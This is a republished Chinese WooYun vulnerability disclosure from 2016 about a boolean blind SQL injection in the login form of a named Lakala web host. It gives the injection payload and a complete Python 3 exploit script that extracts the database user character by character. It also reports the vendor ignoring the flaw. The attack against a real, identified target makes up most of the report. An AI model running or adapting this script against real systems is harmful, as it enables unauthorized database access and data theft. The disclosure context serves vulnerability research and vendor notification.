神刀安全网

漏洞标题: 拉卡拉某站依旧存在POST bool blind(附python 3验证脚本)

漏洞详情

披露状态:

2016-04-05: 细节已通知厂商并且等待厂商处理中
2016-04-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

拉卡拉某站依旧存在POST bool blind(附python 3验证脚本)

详细说明:

最近在研究POC以及EXP的编写,学习lijiejie大牛的漏洞时,由于lijiejie的脚本都在python 2.x环境中,想在python 3学习,需要修改下代码

手动修改时,发现这个漏洞 WooYun: 拉卡拉某站点存在MySQL注射(附验证脚本) 已经公开了一年多

但是却依然没有修复,厂商还是乌云注册厂商

注入方式:POST http://jzlq.lakala.com:7070/pos/index.php?action=login

提交数据:

captcha_keystring=1&password_login=&password_login_show=&username=aa"XOR(if(length(user())=15,1,0))OR"bb

code 区域
MySQL user is [email protected]

漏洞标题:  拉卡拉某站依旧存在POST bool blind(附python 3验证脚本)

漏洞证明:

EXP(python 3.4):

code 区域
# -*- coding:utf-8 -*-
import http.client
import time
import string
import sys
import random
import urllib.request
import urllib.parse
import urllib

headers = {'Content-Type': 'application/x-www-form-urlencoded'}
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')

print("Start to retrive MySQL User:/n")

user = ''

for i in range(1, 16):
for payload in payloads:
sys.stdout.write('.')
sys.stdout.flush()
conn = http.client.HTTPConnection('jzlq.lakala.com:7070', timeout=3)
s = 'aa"XOR(if(ascii(mid(user()from(%s)for(1)))=%s,1,0))OR"bb' % (i, ord(payload))
conn.request(method='POST',
url='/pos/index.php?action=login',
body='aptcha_keystring=&password_login=&password_login_show=&username=' + urllib.parse.quote(s),
headers=headers)
html_doc = conn.getresponse().read().decode('utf-8')
conn.close()
if html_doc.find(u'请输入新密码') > 0:
user += payload
print('/r[In Progress]' + user)
break

print("/n[Done]MySQL user is %s" % user)

修复方案:

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 拉卡拉某站依旧存在POST bool blind(附python 3验证脚本)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮